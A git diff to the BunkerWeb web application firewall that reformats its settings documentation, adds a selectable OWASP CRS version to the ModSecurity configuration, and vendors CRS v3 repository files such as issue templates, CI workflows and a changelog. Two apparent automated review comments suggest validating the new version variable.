| +| `REVERSE_PROXY_URL` | | multisite | yes | Location URL that will be proxied. | +| `REVERSE_PROXY_WS` | `no` | multisite | yes | Enable websocket on the proxied resource. | +| `REVERSE_PROXY_HEADERS` | | multisite | yes | List of HTTP headers to send to proxied resource separated with semicolons (values for proxy_set_header directive). | +| `REVERSE_PROXY_HEADERS_CLIENT` | | multisite | yes | List of HTTP headers to send to client separated with semicolons (values for add_header directive). | +| `REVERSE_PROXY_BUFFERING` | `yes` | multisite | yes | Enable or disable buffering of responses from proxied resource. | +| `REVERSE_PROXY_KEEPALIVE` | `no` | multisite | yes | Enable or disable keepalive connections with the proxied resource. | +| `REVERSE_PROXY_AUTH_REQUEST` | | multisite | yes | Enable authentication using an external provider (value of auth_request directive). | +| `REVERSE_PROXY_AUTH_REQUEST_SIGNIN_URL` | | multisite | yes | Redirect clients to sign-in URL when using REVERSE_PROXY_AUTH_REQUEST (used when auth_request call returned 401). | +| `REVERSE_PROXY_AUTH_REQUEST_SET` | | multisite | yes | List of variables to set from the authentication provider, separated with semicolons (values of auth_request_set directives). | +| `USE_PROXY_CACHE` | `no` | multisite | no | Enable or disable caching of the proxied resources. | +| `PROXY_CACHE_PATH_LEVELS` | `1:2` | global | no | Hierarchy levels of the cache. | +| `PROXY_CACHE_PATH_ZONE_SIZE` | `10m` | global | no | Maximum size of cached metadata when caching proxied resources. | +| `PROXY_CACHE_PATH_PARAMS` | `max_size=100m` | global | no | Additional parameters to add to the proxy_cache directive. | +| `PROXY_CACHE_METHODS` | `GET HEAD` | multisite | no | HTTP methods that should trigger a cache operation. | +| `PROXY_CACHE_MIN_USES` | `2` | multisite | no | The minimum number of requests before a response is cached. 
| +| `PROXY_CACHE_KEY` | `$scheme$host$request_uri` | multisite | no | The key used to uniquely identify a cached response. | +| `PROXY_CACHE_VALID` | `200=24h 301=1h 302=24h` | multisite | no | Define the caching time depending on the HTTP status code (list of status=time), separated with spaces. | +| `PROXY_NO_CACHE` | `$http_pragma $http_authorization` | multisite | no | Conditions to disable caching of responses. | +| `PROXY_CACHE_BYPASS` | `0` | multisite | no | Conditions to bypass caching of responses. | +| `REVERSE_PROXY_CONNECT_TIMEOUT` | `60s` | multisite | yes | Timeout when connecting to the proxied resource. | +| `REVERSE_PROXY_READ_TIMEOUT` | `60s` | multisite | yes | Timeout when reading from the proxied resource. | +| `REVERSE_PROXY_SEND_TIMEOUT` | `60s` | multisite | yes | Timeout when sending to the proxied resource. | +| `REVERSE_PROXY_INCLUDES` | | multisite | yes | Additional configuration to include in the location block, separated with spaces. | ### Reverse scan 
@@ -485,11 +501,11 @@ STREAM support :white_check_mark: Scan clients ports to detect proxies or servers. -| Setting | Default | Context |Multiple| Description | -|----------------------|--------------------------|---------|--------|------------------------------------------------------------------| -|`USE_REVERSE_SCAN` |`no` |multisite|no |Enable scanning of clients ports and deny access if one is opened.| -|`REVERSE_SCAN_PORTS` |`22 80 443 3128 8000 8080`|multisite|no |List of port to scan when using reverse scan feature. | -|`REVERSE_SCAN_TIMEOUT`|`500` |multisite|no |Specify the maximum timeout (in ms) when scanning a port. | +| Setting | Default | Context | Multiple | Description | +| ---------------------- | -------------------------- | --------- | -------- | ------------------------------------------------------------------ | +| `USE_REVERSE_SCAN` | `no` | multisite | no | Enable scanning of clients ports and deny access if one is opened. | +| `REVERSE_SCAN_PORTS` | `22 80 443 3128 8000 8080` | multisite | no | List of port to scan when using reverse scan feature. | +| `REVERSE_SCAN_TIMEOUT` | `500` | multisite | no | Specify the maximum timeout (in ms) when scanning a port. | ### Self-signed certificate 
@@ -497,11 +513,11 @@ STREAM support :white_check_mark: Generate self-signed certificate. -| Setting | Default | Context |Multiple| Description | -|--------------------------|----------------------|---------|--------|-----------------------------------------| -|`GENERATE_SELF_SIGNED_SSL`|`no` |multisite|no |Generate and use self-signed certificate.| -|`SELF_SIGNED_SSL_EXPIRY` |`365` |multisite|no |Self-signed certificate expiry in days. | -|`SELF_SIGNED_SSL_SUBJ` |`/CN=www.example.com/`|multisite|no |Self-signed certificate subject. | +| Setting | Default | Context | Multiple | Description | +| -------------------------- | ---------------------- | --------- | -------- | ----------------------------------------- | +| `GENERATE_SELF_SIGNED_SSL` | `no` | multisite | no | Generate and use self-signed certificate. | +| `SELF_SIGNED_SSL_EXPIRY` | `365` | multisite | no | Self-signed certificate expiry in days. | +| `SELF_SIGNED_SSL_SUBJ` | `/CN=www.example.com/` | multisite | no | Self-signed certificate subject. | ### Sessions 
@@ -509,15 +525,15 @@ STREAM support :white_check_mark: Management of session used by other plugins. -| Setting |Default |Context|Multiple| Description | -|---------------------------|--------|-------|--------|---------------------------------------------------------------------------------| -|`SESSIONS_SECRET` |`random`|global |no |Secret used to encrypt sessions variables for storing data related to challenges.| -|`SESSIONS_NAME` |`random`|global |no |Name of the cookie given to clients. | -|`SESSIONS_IDLING_TIMEOUT` |`1800` |global |no |Maximum time (in seconds) of inactivity before the session is invalidated. | -|`SESSIONS_ROLLING_TIMEOUT` |`3600` |global |no |Maximum time (in seconds) before a session must be renewed. | -|`SESSIONS_ABSOLUTE_TIMEOUT`|`86400` |global |no |Maximum time (in seconds) before a session is destroyed. | -|`SESSIONS_CHECK_IP` |`yes` |global |no |Destroy session if IP address is different than original one. | -|`SESSIONS_CHECK_USER_AGENT`|`yes` |global |no |Destroy session if User-Agent is different than original one. | +| Setting | Default | Context | Multiple | Description | +| --------------------------- | -------- | ------- | -------- | --------------------------------------------------------------------------------- | +| `SESSIONS_SECRET` | `random` | global | no | Secret used to encrypt sessions variables for storing data related to challenges. | +| `SESSIONS_NAME` | `random` | global | no | Name of the cookie given to clients. | +| `SESSIONS_IDLING_TIMEOUT` | `1800` | global | no | Maximum time (in seconds) of inactivity before the session is invalidated. | +| `SESSIONS_ROLLING_TIMEOUT` | `3600` | global | no | Maximum time (in seconds) before a session must be renewed. | +| `SESSIONS_ABSOLUTE_TIMEOUT` | `86400` | global | no | Maximum time (in seconds) before a session is destroyed. | +| `SESSIONS_CHECK_IP` | `yes` | global | no | Destroy session if IP address is different than original one. 
| +| `SESSIONS_CHECK_USER_AGENT` | `yes` | global | no | Destroy session if User-Agent is different than original one. | ### UI @@ -525,10 +541,10 @@ STREAM support :x: Integrate easily the BunkerWeb UI. -| Setting |Default| Context |Multiple| Description | -|---------|-------|---------|--------|--------------------------------------------| -|`USE_UI` |`no` |multisite|no |Use UI | -|`UI_HOST`| |global |no |Address of the web UI used for initial setup| +| Setting | Default | Context | Multiple | Description | +| --------- | ------- | --------- | -------- | -------------------------------------------- | +| `USE_UI` | `no` | multisite | no | Use UI | +| `UI_HOST` | | global | no | Address of the web UI used for initial setup | ### Whitelist 
@@ -536,17 +552,17 @@ STREAM support :warning: Allow access based on internal and external IP/network/rDNS/ASN whitelists. -| Setting | Default | Context |Multiple| Description | -|---------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|----------------------------------------------------------------------------------| -|`USE_WHITELIST` |`yes` |multisite|no |Activate whitelist feature. | -|`WHITELIST_IP` |`20.191.45.212 40.88.21.235 40.76.173.151 40.76.163.7 20.185.79.47 52.142.26.175 20.185.79.15 52.142.24.149 40.76.162.208 40.76.163.23 40.76.162.191 40.76.162.247` |multisite|no |List of IP/network, separated with spaces, to put into the whitelist. | -|`WHITELIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to whitelist. | -|`WHITELIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS whitelist checks on global IP addresses. | -|`WHITELIST_RDNS` |`.google.com .googlebot.com .yandex.ru .yandex.net .yandex.com .search.msn.com .baidu.com .baidu.jp .crawl.yahoo.net .fwd.linkedin.com .twitter.com .twttr.com .discord.com`|multisite|no |List of reverse DNS suffixes, separated with spaces, to whitelist. | -|`WHITELIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist.| -|`WHITELIST_ASN` |`32934` |multisite|no |List of ASN numbers, separated with spaces, to whitelist. | -|`WHITELIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to whitelist. | -|`WHITELIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to whitelist. | -|`WHITELIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to whitelist. | -|`WHITELIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to whitelist. 
| -|`WHITELIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to whitelist. | +| Setting | Default | Context | Multiple | Description | +| --------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ---------------------------------------------------------------------------------- | +| `USE_WHITELIST` | `yes` | multisite | no | Activate whitelist feature. | +| `WHITELIST_IP` | `20.191.45.212 40.88.21.235 40.76.173.151 40.76.163.7 20.185.79.47 52.142.26.175 20.185.79.15 52.142.24.149 40.76.162.208 40.76.163.23 40.76.162.191 40.76.162.247` | multisite | no | List of IP/network, separated with spaces, to put into the whitelist. | +| `WHITELIST_IP_URLS` | | global | no | List of URLs, separated with spaces, containing good IP/network to whitelist. | +| `WHITELIST_RDNS_GLOBAL` | `yes` | multisite | no | Only perform RDNS whitelist checks on global IP addresses. | +| `WHITELIST_RDNS` | `.google.com .googlebot.com .yandex.ru .yandex.net .yandex.com .search.msn.com .baidu.com .baidu.jp .crawl.yahoo.net .fwd.linkedin.com .twitter.com .twttr.com .discord.com` | multisite | no | List of reverse DNS suffixes, separated with spaces, to whitelist. | +| `WHITELIST_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist. | +| `WHITELIST_ASN` | `32934` | multisite | no | List of ASN numbers, separated with spaces, to whitelist. | +| `WHITELIST_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to whitelist. | +| `WHITELIST_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to whitelist. | +| `WHITELIST_USER_AGENT_URLS` | | global | no | List of URLs, separated with spaces, containing good User-Agent to whitelist. 
| +| `WHITELIST_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to whitelist. | +| `WHITELIST_URI_URLS` | | global | no | List of URLs, separated with spaces, containing bad URI to whitelist. | diff --git a/src/bw/entrypoint.sh b/src/bw/entrypoint.sh index d00e3076f..3eab5b7c6 100644 --- a/src/bw/entrypoint.sh +++ b/src/bw/entrypoint.sh @@ -44,7 +44,7 @@ function trap_reload() { trap "trap_reload" HUP # generate "temp" config -echo -e "IS_LOADING=yes\nUSE_BUNKERNET=no\nSERVER_NAME=\nAPI_HTTP_PORT=${API_HTTP_PORT:-5000}\nAPI_SERVER_NAME=${API_SERVER_NAME:-bwapi}\nAPI_WHITELIST_IP=${API_WHITELIST_IP:-127.0.0.0/8}\nUSE_REAL_IP=${USE_REAL_IP:-no}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL:-no}\nREAL_IP_FROM=${REAL_IP_FROM:-192.168.0.0/16 172.16.0.0/12 10.0.0.0/8}\nREAL_IP_HEADER=${REAL_IP_HEADER:-X-Forwarded-For}\nHTTP_PORT=${HTTP_PORT:-8080}\nHTTPS_PORT=${HTTPS_PORT:-8443}" > /tmp/variables.env +echo -e "IS_LOADING=yes\nUSE_BUNKERNET=no\nSEND_ANONYMOUS_REPORT=no\nSERVER_NAME=\nMODSECURITY_CRS_VERSION=${MODSECURITY_CRS_VERSION:-4}\nAPI_HTTP_PORT=${API_HTTP_PORT:-5000}\nAPI_SERVER_NAME=${API_SERVER_NAME:-bwapi}\nAPI_WHITELIST_IP=${API_WHITELIST_IP:-127.0.0.0/8}\nUSE_REAL_IP=${USE_REAL_IP:-no}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL:-no}\nREAL_IP_FROM=${REAL_IP_FROM:-192.168.0.0/16 172.16.0.0/12 10.0.0.0/8}\nREAL_IP_HEADER=${REAL_IP_HEADER:-X-Forwarded-For}\nHTTP_PORT=${HTTP_PORT:-8080}\nHTTPS_PORT=${HTTPS_PORT:-8443}" > /tmp/variables.env python3 /usr/share/bunkerweb/gen/main.py --variables /tmp/variables.env # start nginx diff --git a/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec b/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec index 832f3e7d2..d9d8bc0c0 100644 --- a/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec +++ b/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec 
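Review bot: The temporary config written by the changed `echo -e` line falls back to CRS 4 (`${MODSECURITY_CRS_VERSION:-4}`), while the CHANGELOG entry added in this same commit says the default is v3. If the loading-phase config is meant to follow the documented default, the expansion should read `MODSECURITY_CRS_VERSION=${MODSECURITY_CRS_VERSION:-3}`; if 4 is deliberate here, a comment above the line should say why. The value also comes from the environment unchecked and appears to be used later to build ModSecurity `include` paths, so I would reject anything other than the two shipped versions before writing `/tmp/variables.env`, e.g. `case "${MODSECURITY_CRS_VERSION:-4}" in 3|4) ;; *) echo "invalid MODSECURITY_CRS_VERSION" >&2; exit 1 ;; esac`. Because the line uses `echo -e`, backslash sequences in any interpolated value are interpreted rather than written literally, so one `printf '%s\n' "NAME=value"` per setting would be the safer way to emit the file. The script continues outside this hunk, so an existing check elsewhere cannot be ruled out from here.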
@@ -66,7 +66,7 @@ SecAuditLog /var/log/bunkerweb/modsec_audit.log # include OWASP CRS configurations {% if USE_MODSECURITY_CRS == "yes" %} -include /usr/share/bunkerweb/core/modsecurity/files/crs-setup.conf +include /usr/share/bunkerweb/core/modsecurity/files/crs-setup-v{{ MODSECURITY_CRS_VERSION }}.conf # custom CRS configurations before loading rules (e.g. exclusions) {% if is_custom_conf("/etc/bunkerweb/configs/modsec-crs") %} @@ -100,7 +100,7 @@ SecRule ENV:is_whitelisted "yes" "id:1000,phase:1,allow,nolog,ctl:ruleEngine=Off {% endif +%} # include OWASP CRS rules -include /usr/share/bunkerweb/core/modsecurity/files/coreruleset/rules/*.conf +include /usr/share/bunkerweb/core/modsecurity/files/coreruleset-v{{ MODSECURITY_CRS_VERSION }}/rules/*.conf {% endif +%} # custom rules after loading the CRS diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/01_false-positive.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/01_false-positive.md new file mode 100644 index 000000000..eeb0b7a3e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/01_false-positive.md @@ -0,0 +1,34 @@ +--- +name: 'False positive' +about: Report a false positive (incorrect blocking) +title: '' +labels: 'False Positive' +assignees: '' +--- + +### Description + + + + + +### Audit Logs / Triggered Rule Numbers + + + + +### Your Environment + + + + +* CRS version (e.g., v3.2.0): +* Paranoia level setting: +* ModSecurity version (e.g., 2.9.3): +* Web Server and version (e.g., apache 2.4.41): +* Operating System and version: + +### Confirmation + +[ ] I have removed any personal data (email addresses, IP addresses, + passwords, domain names) from any logs posted. 
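Review bot: `MODSECURITY_CRS_VERSION` is substituted directly into the `include` paths, in `crs-setup-v{{ MODSECURITY_CRS_VERSION }}.conf` here and in `coreruleset-v{{ MODSECURITY_CRS_VERSION }}/rules/*.conf` in the second hunk, and nothing visible in the template restricts it to the two shipped rule sets. Unless the setting's definition already constrains it to `3` or `4` (not visible in this chunk), an unexpected value yields a path that does not exist, and for the glob include in the second hunk it is worth confirming that zero matches is a hard error rather than a silent load of no CRS rules. I would normalise the value once at the top of the `USE_MODSECURITY_CRS` block, for example `{% set crs_version = MODSECURITY_CRS_VERSION if MODSECURITY_CRS_VERSION in ["3", "4"] else "3" %}`, and use `crs_version` in both includes, or fail configuration generation outright if failing closed is preferred. A short comment such as `# MODSECURITY_CRS_VERSION selects crs-setup-vN.conf and coreruleset-vN/ (3 or 4 only)` would also help. The `{% if USE_MODSECURITY_CRS == "yes" %}` block starts and ends outside both hunks.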
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/02_false-negative.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/02_false-negative.md new file mode 100644 index 000000000..75b0e3544 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/02_false-negative.md @@ -0,0 +1,33 @@ +--- +name: 'False negative' +about: Report a false negative (incorrect bypass) +title: '' +labels: 'False Negative - Evasion' +assignees: '' +--- + +### Description + + + + + + + + + +### Your Environment + + + + +* CRS version (e.g., v3.2.0): +* Paranoia level setting: +* ModSecurity version (e.g., 2.9.3): +* Web Server and version (e.g., apache 2.4.41): +* Operating System and version: + +### Confirmation + +[ ] I have removed any personal data (email addresses, IP addresses, + passwords, domain names) from any logs posted. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/03_bug-report.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/03_bug-report.md new file mode 100644 index 000000000..bc130f67f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/03_bug-report.md @@ -0,0 +1,39 @@ +--- +name: '🐞 Bug report' +about: Create a report to help us improve +title: '' +labels: 'Bug' +assignees: '' +--- + +### Describe the bug + + + +### Steps to reproduce + + + +### Expected behaviour + + + +### Actual behaviour + + + + +### Additional context + + + +### Your Environment + + + + +* CRS version (e.g., v3.2.0): +* Paranoia level setting: +* ModSecurity version (e.g., 2.9.3): +* Web Server and version (e.g., apache 2.4.41): +* Operating System and version: diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/04_feature.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/04_feature.md new file mode 100644 index 000000000..b2e82b611 
--- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/04_feature.md @@ -0,0 +1,28 @@ +--- +name: '🚀 Feature request' +about: Suggest an idea for this project +title: '' +labels: 'Feature Request' +assignees: '' +--- + +### Motivation + + + + +### Proposed solution + + + + +### Alternatives + + + + + +### Additional context + + + diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/config.yml b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/config.yml new file mode 100644 index 000000000..4c1d7af74 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/config.yml @@ -0,0 +1,8 @@ +blank_issues_enabled: false +contact_links: + - name: Help and support + url: https://security.stackexchange.com/questions/tagged/owasp-crs + about: For help and support please go here. + - name: OWASP Core Rule Set mailing list + url: https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project + about: Ask general usage questions and participate in discussions on the CRS. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/lint.yaml b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/lint.yaml new file mode 100644 index 000000000..839317240 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/lint.yaml 
@@ -0,0 +1,37 @@ +--- +name: Lint + +on: [push, pull_request] + +jobs: + check-syntax: + runs-on: ubuntu-latest + strategy: + fail-fast: true + # check why is failing and change afterwards + steps: + - name: Checkout repo + uses: actions/checkout@v2 + + - name: Lint Yaml + uses: ibiqlik/action-yamllint@v3 + with: + format: github + file_or_dir: tests/regression/tests + config_file: .yamllint.yml + + - name: Linelint + uses: fernandrone/linelint@master + id: linelint + + - name: Set up Python 3 + uses: actions/setup-python@v2 + with: + python-version: 3.7 + + - name: "Check CRS syntax" + run: | + pip install --upgrade setuptools + pip install secrules-parsing + secrules-parser -c --output-type github -f rules/*.conf + diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/stale.yml b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/stale.yml new file mode 100644 index 000000000..f3e129c8b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/stale.yml @@ -0,0 +1,19 @@ +name: Mark stale issues + +on: + schedule: + - cron: "0 0 * * *" + +jobs: + stale: + + runs-on: ubuntu-latest + + steps: + - uses: actions/stale@v1 + with: + repo-token: ${{ secrets.GITHUB_TOKEN }} + stale-issue-message: 'This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days' + stale-issue-label: 'Stale issue' + days-before-stale: 120 + days-before-close: 14 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/test.yml b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/test.yml new file mode 100644 index 000000000..de86f4989 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/test.yml 
@@ -0,0 +1,59 @@ +--- +name: Regression Tests + +on: + push: + paths: + - 'rules/**' + - 'tests/**' + - '.github/**' + pull_request: + paths: + - 'rules/**' + - 'tests/**' + - '.github/**' + +jobs: + regression: + runs-on: ubuntu-latest + strategy: + matrix: + modsec_version: [modsec2-apache] + steps: + - name: "Checkout repo" + uses: actions/checkout@v3 + + - name: "Install dependencies" + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GO_FTW_VERSION: '0.4.6' + run: | + gh release download -R coreruleset/go-ftw v${GO_FTW_VERSION} -p "ftw_${GO_FTW_VERSION}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw + + - name: "Run tests for ${{ matrix.modsec_version }}" + run: | + mkdir -p tests/logs/${{ matrix.modsec_version }}/{nginx,apache2} + docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" + docker-compose -f ./tests/docker-compose.yml logs + [ $(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}') = 'true' ] + ./ftw check -d tests/regression/tests + ./ftw run -d tests/regression/tests --show-failures-only + env: + FTW_LOGFILE: './tests/logs/modsec2-apache/error.log' + + - name: "Change permissions if failed" + if: failure() + run: | + # we want to get the audit log, so change permissions (file is only for root on docker) + sudo chmod 644 tests/logs/${{ matrix.modsec_version }}/modsec_audit.log + + - uses: actions/upload-artifact@v2 + if: failure() + with: + name: waf-logs + path: tests/logs/${{ matrix.modsec_version }} + + - name: Clean docker-compose + run: | + docker-compose -f ./tests/docker-compose.yml stop "${{ matrix.modsec_version }}" + docker-compose -f ./tests/docker-compose.yml down diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.gitignore b/src/common/core/modsecurity/files/coreruleset-v3/.gitignore new file mode 100644 index 000000000..a8f9bac6b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.gitignore 
@@ -0,0 +1,21 @@ +*.swp +*.swo + +# User configuration +crs-setup.conf +rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf +rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf + +# The MaxMind GeoIP database can be downloaded or upgraded by running: +# util/upgrade.py geoip +util/geo-location/GeoIP.dat + +# Unit test caches +.cache + +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +.idea/ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.gitmodules b/src/common/core/modsecurity/files/coreruleset-v3/.gitmodules new file mode 100644 index 000000000..592118760 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.gitmodules @@ -0,0 +1,4 @@ +[submodule "docs/OWASP-CRS-Documentation"] + path = docs/OWASP-CRS-Documentation + url = https://github.com/SpiderLabs/OWASP-CRS-Documentation + branch = master diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.linelint.yml b/src/common/core/modsecurity/files/coreruleset-v3/.linelint.yml new file mode 100644 index 000000000..12e7c88e6 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.linelint.yml @@ -0,0 +1,12 @@ +rules: + # checks if file ends in a newline character + end-of-file: + # set to true to enable this rule + enable: true + + # set to true to disable autofix (if enabled globally) + disable-autofix: true + + # will be ignored only by this rule + ignore: + - .pytest_cache/* diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.travis.yml b/src/common/core/modsecurity/files/coreruleset-v3/.travis.yml new file mode 100644 index 000000000..96765998f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.travis.yml 
@@ -0,0 +1,31 @@ +os: linux +language: python +python: + - 2.7 + +# no more required in travis +#sudo: required + +services: + - docker + +jobs: + include: + script: + - | + if [[ "$TRAVIS_PULL_REQUEST" != "false" ]]; then + docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_PULL_REQUEST_SLUG -e BRANCH=$TRAVIS_PULL_REQUEST_BRANCH themiddle/crs-test + else + docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_REPO_SLUG -e BRANCH=$TRAVIS_BRANCH themiddle/crs-test + fi + +# safelist +branches: + only: + - v3.1/dev + - v3.2/dev + - v3.3/dev + - fix-travis + +#notifications: +# irc: "chat.freenode.net#modsecurity" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.yamllint.yml b/src/common/core/modsecurity/files/coreruleset-v3/.yamllint.yml new file mode 100644 index 000000000..c07e5911d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.yamllint.yml @@ -0,0 +1,20 @@ +extends: default + +rules: + # Test lines can be big + line-length: + max: 1024 + level: warning + # These files below have very large lines, needed for the test. + # So they will raise warnings every time. + ignore: | + tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml + tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml + tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml + + # don't bother me with this rule + indentation: disable + + comments: + require-starting-space: true # default + min-spaces-from-content: 1 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/CHANGES.md b/src/common/core/modsecurity/files/coreruleset-v3/CHANGES.md new file mode 100644 index 000000000..444e4f71f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/CHANGES.md 
@@ -0,0 +1,1499 @@ +# OWASP ModSecurity Core Rule Set (CRS) CHANGES + +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist + +* + or the CRS Google Group at +* + +## Version 3.3.5 - 2023-07-18 + +Important changes: + +* Backport fix for CVE-2023-38199 from CRS v4 via new rule 920620 (Andrea Menin, Felipe Zipitría) + +Fixes: + +* Fix paranoia level-related scoring issue in rule 921422 (Walter Hop) +* Move auditLogParts actions to the end of chained rules where used (Ervin Hegedus) + +Chore: + +* Clean up redundant paranoia level tags (Ervin Hegedus) +* Clean up YAML test files to support go-ftw testing framework (Felipe Zipitría) +* Move testing framework from ftw to go-ftw (Felipe Zipitría) + +## Version 3.3.4 - 2022-09-20 + +Fixes and improvements: + +* Fix a regression in our former release, with the impact that some Paranoia Level 2 rules would activate even when running in Paranoia Level 1. (Simon Studer, Walter Hop) + +## Version 3.3.3 - 2022-09-19 + +Important changes: + +* This update requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports of the security fixes in these versions) or a compatible engine supporting these changes. If you do not upgrade ModSecurity, the file REQUEST-922-MULTIPART-ATTACK.conf will cause ModSecurity to fail to start. In that case, you can temporarily delete that file. However, you will be missing protection from these rules. Therefore, we recommend upgrading your ModSecurity or other engine instead. +* By default, the request headers "Accept-Charset" and "Content-Encoding" are now blocked to prevent a WAF bypass. Especially the "Accept-Charset" header may be in use by clients. If you need to serve clients that send this header, uncomment and edit rule 900250 in crs-setup.conf. 
+
+Fixes and improvements:
+
+* Fix CVE-2022-39955 Multiple charsets defined in Content-Type header (Jan Gora)
+* Fix CVE-2022-39956 Content-Type or Content-Transfer-Encoding MIME header fields abuse (Jan Gora, Felipe Zipitria)
+* Fix CVE-2022-39957 Charset accept header field resulting in response rule set bypass (Karel Knibbe, Max Leske)
+* Fix CVE-2022-39958 Small range header leading to response rule set bypass (Hussein Daher, Christian Folini)
+* Fix MIME header abuse via _charset_ field (Jan Gora, Felipe Zipitria)
+* Fix bypass using deflated request body (Karel Knibbe)
+* Fix request body partial rule set bypass via Content-Type "text/plain" (Pinaki Mondal, Andrea Menin)
+* Fix XML Body Parser abuse for non-XML request bodies (Jan Gora)
+* Fix body processor bypass by content-type outside the mime type declaration (Jan Gora, Simon Studer, Ervin Hegedus)
+
+## Version 3.3.2 - 2021-06-30
+
+Fixes and improvements:
+
+* Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini)
+
+## Version 3.3.0 - 2020-07-01
+
+Important changes:
+
+* The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use.
+ +New functionality: + +* Block backup files ending with ~ in filename (Andrea Menin) +* Detect ffuf vuln scanner (Will Woodson) +* Detect Nuclei vuln scanner (azurit) +* Detect SemrushBot crawler (Christian Folini) +* Detect WFuzz vuln scanner (azurit) +* New LDAP injection rule (Christian Folini) +* New HTTP Splitting rule (Andrea Menin) +* Add .swp to restricted extensions (Andrea Menin) +* Allow CloudEvents content types (Bobby Earl) +* Add CAPEC tags for attack classification (Fernando Outeda, Christian Folini) +* Detect Unix RCE bypass techniques via uninitialized variables, string concatenations and globbing patterns (Andrea Menin) + +Removed functionality: + +* Removed outdated rule tags WASCTC, OWASP_TOP_10, OWASP_AppSensor/RE1, and OWASP_CRS/FOO/BAR; note that tags 'OWASP_CRS' and 'attack-type' are kept. (Christian Folini) + +Improved compatibility: + +* Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus) + +Fixes and improvements: + +* WordPress: Add support for upload image/media in Gutenberg Editor (agusmu) +* Prevent bypass of rule 921110 (Amit Klein, Franziska 